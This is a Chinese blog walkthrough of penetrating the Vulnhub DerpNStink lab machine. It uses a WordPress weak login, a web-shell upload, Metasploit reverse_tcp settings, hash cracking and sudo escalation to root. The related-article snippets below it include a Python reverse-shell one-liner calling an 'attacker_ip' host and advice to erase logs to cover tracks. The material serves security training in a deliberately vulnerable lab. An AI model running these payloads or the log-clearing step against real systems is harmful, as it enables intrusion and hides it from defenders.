Vulnhub:Derpnstink靶机渗透

最新推荐文章于 2024-10-26 23:41:20 发布
最新推荐文章于 2024-10-26 23:41:20 发布
阅读量1.3k 收藏 5
点赞数
分类专栏: ctf实战 文章标签: php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62008601/article/details/128443253
版权
本文通过一次实战演练详细介绍了如何使用Kali Linux对目标系统进行渗透测试的过程。从初始的网络扫描开始,逐步深入到利用WordPress网站的弱点获取系统权限,最终完成提权获得root访问权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

fc9d3b282e794334ab2fd7d1aa8535de.png

扫描服务版本信息

9d75e0ff8d714801afeac4ca216feecb.png

 

开启了21、22、80端口,分别对应着ftp、ssh、http服务,打开浏览器进行访问

db94c83955dc4c6085dfdb6f7880ede8.png

 

查看源代码发现flag1和info.txt

9a3583d398ef42a89f89a29ea4297acd.png

 点开info.txt

d2588d87a0ea475e84a5c523b6beb0e6.png

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,weblog目录下存在登录页面,php目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

cf099bf3d4d84c9fb112ba23db17f818.png

进行访问的时候会发现weblog目录下的都打不开

12974d2f410f484fb904c4adb0e4c57e.png

刚好前面也拿到提示说要在本地添加一个dns记录,

Linux系统在/etc/hosts文件中进行添加

525202606abf4ef29c3e0aa5da51eb60.png

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

3b3637aba9b2473387829eb1106c6985.png

很明显是一个wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

a60a9fda753749b6b6624801cf84cfab.png

 登录到刚刚的网站

3254efea72d047faa8d3f1295ed6e82e.png

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

cc07c6c1e1b043db87fdf440add63677.png

查找配置文件并查看,拿到数据库的用户名和密码

27c8bad5f803427e91e92f6ebcc746b1.png

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

d54e94bd3a294bbe8402ae3ee54dc3a2.png

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

b08bb28290874c29ab7f504c8186baae.png

发现存在可以利用的模块,直接一把梭拿shell

use 1

set payload php/meterpreter/reverse_tcp

set rhosts 192.168.56.114

set lhost 192.168.56.108

set targeturi /weblog

set wp_user admin

set wp_password admin

 

78e3a35389aa4f58a6b956a7d44ab7da.png

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

d171a2308263474b8053bea6c7e8e20b.png

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

165ad58b55f54f5f9ca49245f34793c3.png

同时还发现了另外一个账号密码

e7f222aaeeda42159542c05af47260c5.png

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 639db01fc76c46b4ae6e7503b174fb5b.png

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

dd40ceef6add4d4bb81080ae761135cc.png

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

03775676e1eb42a2b9e083664ac12e07.png

在Desktop目录发现了flag3

04b360376f7744388a4d307fa50f36c1.png

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

4a16384b6366468b8bb45d58adacf6fb.png

在shell里切换登录到mrderp,发现不可行

d2f97a33c0e242559a12b028b1ccdeb4.png

接着尝试使用ssh进行远程连接

d66f68a3fe6f4aa4ba06c791a8ec0983.png

连接成功,并在Desktop目录下发现了一个日志文件

6a1e4befe6154700bb44defacc218c59.png

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

4a85c8fa1c824be1829fa77000eb72e5.png

9dd56ee66f984a48af6d63a545c90e95.png

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binaries

cd binaries

echo “/bin/bash” >> derpy.sh

chmod +x derpy.sh

sudo ./derpy.sh

 

a9322fd9b9834825ab6b74b255616919.png

最后在root目录下的Desktop目录找到最后一个flag

 

DeRPnStiNK
战神/calmness的博客
01-19 670
目录 信息泄露 查看robots.txt wpscan 插件漏洞 反弹shell wp-config.php 破解密码john stinky 用户 发现私钥 NC 下载流量包 sudo提权 sudo -l 信息泄露 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;...
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 421
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
DerpNStink靶机
hqy250019的博客
08-05 406
拼接/php/phpmyadmin/ 一个mysql管理界面,不知道版本,只能口令爆破一下,用了root root’ or 1=1#常见的账号密码都不行,就暂时放一下。提示可以在靶机下运行derpy文件,但是实际上靶机上不存在该目录和文件,这里我们创建个相同目录,然后创建文件,随意写入代码;先访问页面,查看网页源代码,获得第一个flag,并获得提示,在hosts配置DNS。在ssh目录下找了key文件(目录隐藏的比较深),通过ftp下载key.txt文件到本地;没什么发现了,用dirb扫描一下目录。
渗透测试靶机---DerpNStink
久恙502的博客
11-06 984
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1208
wordpress后台弱口令,插件Slideshow任意文件上传
VulnHub靶机-DerpNStink
Slow_的博客
02-20 457
VulnHub靶机-DerpNStinkVulnHub靶机-DerpNStink一、信息收集功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 VulnHub靶机-DerpNStink 下载地址:https://www.vulnhub
DerpNStink打靶思路详解(vulnhub
MCcming的博客
03-16 1115
尝试一下弱口令你妹的,只允许使用密钥登陆。
Vulhub DerpNStink: 1靶机详解
weixin_62457642的博客
10-15 844
靶机DerpNStink: 1速刷
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 937
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
DerpNStink打靶思路详解(vulnhub),2024最新腾讯网络安全面试分享
2401_84411822的博客
04-17 1010
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
VulnhubDeRPnStiNK渗透测试
mandarava的博客
03-08 1117
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 1022
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
DerpNStink: 1渗透测试
sucker的博客
10-26 1249
30,查看ftp服务器里面的私钥文件,路径:/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh。16,得到的账户密码用来登录http://derpnstink.local/php/phpmyadmin。22,得到数据库配置文件的绝对路径:/var/www/html/weblog/wp-config.php。,查看数据库配置文件,路径/var/www/html/weblog/wp-config.php。提示访问https://pastebin.com/RzK9WfGw。
derpnstink
学习!冲冲冲!
06-12 701
derpnstink
vulnhub:DeRPnStiNK
墨染的博客
10-09 1809
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
DERPNSTINK: 1-打靶渗透【附代码】(权限提升)
网安学习
08-07 1162
DERPNSTINK: 1-打靶渗透【附代码】(权限提升) #DNS的hosts域名解析问题 #CVE-2021-4034的利用
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1689
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
derpnstink靶机渗透测试
最新发布
12-28
### derpnstink 靶机渗透测试 CTF Writeup #### 初始信息收集 对于任何渗透测试活动,初始的信息收集阶段至关重要。在这个阶段,目标是尽可能多地了解目标系统 `derpnstink` 的公开可用信息。这通常涉及使用工具如 Nmap 进行端口扫描来识别开放的服务和版本。 ```bash nmap -A derpnstink ``` 上述命令会执行一个带有操作系统检测、版本检测、脚本扫描以及 traceroute 功能的全面扫描[^1]。 #### 枚举服务漏洞 一旦获得了关于哪些服务正在运行的信息,下一步就是针对这些特定服务进行更深入的研究。例如,如果发现了一个 Web 服务器,则可以利用诸如 Nikto 或者 Dirbuster 工具来进行进一步枚举: ```bash nikto -h http://derpnstink/ dirb http://derpnstink/ wordlist.txt ``` 这里假设存在 HTTP(S) 协议上的 web 应用程序,并尝试通过字典攻击寻找隐藏目录或文件[^2]。 #### 漏洞利用准备 当找到潜在可被利用的安全弱点之后,就需要查阅 CVE 数据库或其他资源确认具体细节并下载相应的 exploit 脚本。Metasploit 是一个非常流行的框架,在其中可能已经包含了所需的模块可以直接调用;当然也可以自己编写 Python/Ruby 等语言实现自定义 payload 发送逻辑。 #### 获取初步访问权限 成功发送恶意载荷后,可能会得到一个低级别用户的 shell 访问权。此时应当立即稳定住这个连接(比如反向 TCP Shell),以便后续操作更加方便可靠[^3]. ```python import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("attacker_ip",port)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); ``` 这段代码展示了如何建立一个简单的 Python 反弹shell 来维持与受控主机之间的交互式 session[^4]. #### 提升权限 Privilege Escalation 获得最初的立足点只是第一步而已,很多时候还需要想办法提权成为管理员账户才能完成最终的目标——读取 flag 文件内容。这时就要考虑是否存在配置错误、弱密码或者其他未打补丁的内核级 bug 等情况了。 #### 清理痕迹 Cover Tracks 最后但同样重要的是,在退出之前务必清理掉所有留下的日志记录和其他能够暴露身份特征的东西,以免留下不必要的麻烦给防守方人员带来困扰。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值